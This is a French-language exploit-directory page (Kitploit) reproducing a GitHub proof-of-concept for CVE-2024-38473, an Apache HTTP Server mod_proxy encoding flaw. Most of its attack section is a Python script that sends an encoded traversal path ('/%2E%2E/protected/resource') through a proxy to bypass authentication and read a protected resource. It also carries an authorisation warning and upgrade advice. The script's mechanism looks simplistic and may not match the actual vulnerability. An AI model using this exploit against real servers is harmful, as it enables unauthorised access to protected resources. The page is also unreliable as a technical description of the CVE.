Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-38473 — Scripts de preuve de concept démontrant une vulnérabilité d'encodage dans le module mod_proxy du serveur Apache HTTP (CVE-2024-38473) qui permet un contournement de l'authentification via des URL de requête conçues pour les services backend. | Kitploit
Outils/GitHubGitHub/abdurahmon3236/cve-2024-38473
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubabdurahmon3236/cve-2024-38473

CVE-2024-38473

Scripts de preuve de concept démontrant une vulnérabilité d'encodage dans le module mod_proxy du serveur Apache HTTP (CVE-2024-38473) qui permet un contournement de l'authentification via des URL de requête conçues pour les services backend.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
32il y a 2 ansPas encore vérifié

Preuve de Concept (PoC) pour le Problème d'Encodage dans mod_proxy du Serveur HTTP Apache

Ce dépôt contient des scripts de Preuve de Concept (PoC) pour démontrer un problème d'encodage dans le module mod_proxy du Serveur HTTP Apache versions 2.4.59 et antérieures. Cette vulnérabilité permet d'envoyer des requêtes avec un encodage incorrect vers les services backend, contournant potentiellement l'authentification via des requêtes conçues.

Table des Matières

  • Description de la Vulnérabilité
  • Configuration et Utilisation
  • Considérations Importantes
  • Mitigation

Description de la Vulnérabilité

CVE-ID: (En attente)

Aperçu : Un problème d'encodage dans le module mod_proxy du Serveur HTTP Apache versions 2.4.59 et antérieures permet d'envoyer des URL de requêtes avec un encodage incorrect vers les services backend. Cela peut potentiellement contourner les mécanismes d'authentification via des requêtes conçues. Il est recommandé de passer à la version 2.4.60, qui corrige ce problème.

Versions Affectées :

  • Serveur HTTP Apache 2.4.59 et antérieures

Version Corrigée :

  • Serveur HTTP Apache 2.4.60

Configuration et Utilisation

Prérequis

  • Python 3.x
  • Bibliothèque requests (pip install requests)

Démonstration de la Vulnérabilité

  1. Identifier le Service Backend :

    • Supposons que le service backend se trouve à http://backend-service.example.com.
  2. Concevoir une Requête Malveillante :

    • La requête malveillante utilisera un encodage incorrect pour contourner l'authentification.
  3. Exécuter le Script PoC :

    • Enregistrez le script suivant sous mod_proxy_poc.py et exécutez-le.

Script PoC

Voici un script Python qui démontre la vulnérabilité :

root@kitploit:~
import requests

# Configuration
proxy_url = "http://proxy-server.example.com"  # Changez ceci par l'URL du serveur proxy
backend_service_path = "/protected/resource"  # Le chemin vers la ressource protégée sur le service backend
malicious_path = "/%2E%2E/protected/resource"  # Chemin mal encodé pour contourner l'authentification

# Requête malveillante à envoyer via le serveur proxy
malicious_url = f"{proxy_url}{malicious_path}"

def send_malicious_request():
    try:
        # Envoyer la requête conçue au serveur proxy
        response = requests.get(malicious_url)
        
        # Afficher les détails de la réponse
        print("Code de statut :", response.status_code)
        print("En-têtes de réponse :", response.headers)
        print("Corps de réponse :", response.text)
        
        if response.status_code == 200:
            print("[+] Authentification contournée avec succès et ressource protégée accédée.")
        else:
            print("[-] Échec du contournement de l'authentification.")
    except Exception as e:
        print("[-] Une erreur est survenue :", str(e))

if __name__ == "__main__":
    send_malicious_request()

Explication

  1. Configuration :

    • proxy_url : L'URL du serveur proxy.
    • backend_service_path : Le chemin vers la ressource protégée sur le service backend.
    • malicious_path : Le chemin mal encodé pour contourner l'authentification.
  2. send_malicious_request :

    • Construit une URL malveillante avec le chemin mal encodé.
    • Envoie une requête GET au serveur proxy avec l'URL malveillante.
    • Affiche les détails de la réponse pour vérifier si l'authentification a été contournée.

Considérations Importantes

  • Autorisations : Assurez-vous d'avoir l'autorisation explicite de tester cette vulnérabilité sur le système cible. L'accès non autorisé est illégal et contraire à l'éthique.
  • Environnement de Test : Effectuez ce test dans un environnement contrôlé pour éviter d'impacter les systèmes de production.

Mitigation

Pour atténuer cette vulnérabilité, mettez à niveau le Serveur HTTP Apache vers la version 2.4.60, qui corrige le problème d'encodage dans le module mod_proxy.

  • Instructions de Mise à Niveau :
    • Suivez la documentation officielle du Serveur HTTP Apache pour télécharger et installer la dernière version.

En maintenant vos logiciels à jour et en suivant les bonnes pratiques de sécurité, vous pouvez prévenir des vulnérabilités telles que ce problème d'encodage dans le module mod_proxy.

Télécharger l’outil